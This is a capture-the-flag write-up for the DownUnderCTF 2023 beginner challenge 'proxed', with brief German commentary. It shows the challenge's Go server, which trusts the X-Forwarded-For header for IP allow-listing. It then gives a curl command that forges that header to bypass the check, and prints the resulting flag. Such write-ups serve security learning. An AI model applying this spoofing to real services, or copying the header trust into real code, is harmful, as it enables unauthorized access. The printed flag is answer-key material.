CTF/DownUnderCTF 2023/beginner/proxed/README.md at main

simon/CTF

Files

Simon Hünecke c42b50e6fd htb updates and ductf update

2023-09-01 16:37:29 +02:00

1.2 KiB

Raw Permalink Blame History

Go Source:

package main

import (
	"flag"
	"fmt"
	"log"
	"net/http"
	"os"
	"strings"
)

var (
	port = flag.Int("port", 8081, "The port to listen on")
)

func main() {

	flag.Parse()

	http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
		xff := r.Header.Values("X-Forwarded-For")

		ip := strings.Split(r.RemoteAddr, ":")[0]

		if xff != nil {
			ips := strings.Split(xff[len(xff)-1], ", ")
			ip = ips[len(ips)-1]
			ip = strings.TrimSpace(ip)
		}

		if ip != "31.33.33.7" {
			message := fmt.Sprintf("untrusted IP: %s", ip)
			http.Error(w, message, http.StatusForbidden)
			return
		} else {
			w.Write([]byte(os.Getenv("FLAG")))
		}
	})

	log.Printf("Listening on port %d", *port)
	log.Fatal(http.ListenAndServe(fmt.Sprintf(":%d", *port), nil))
}

Es ist ziemlich eindeutig, dass man seine IP Adresse spoofen soll, um die Flagge aus den ENV vars zu lesen.

Ein hilfreicher Stack-Overflow Beitrag hilft dabei: https://stackoverflow.com/questions/5188584/how-can-i-spoof-the-sender-ip-address-using-curl

=> SOLVED

┌──(kali㉿kali)-[/ctf/DownUnderCTF 2023/beginner/static file server]
└─$ curl --header "X-Forwarded-For: 31.33.33.7" http://proxed.duc.tf:30019/
DUCTF{17_533m5_w3_f0rg07_70_pr0x}

1.2 KiB Raw Permalink Blame History

1.2 KiB

Raw Permalink Blame History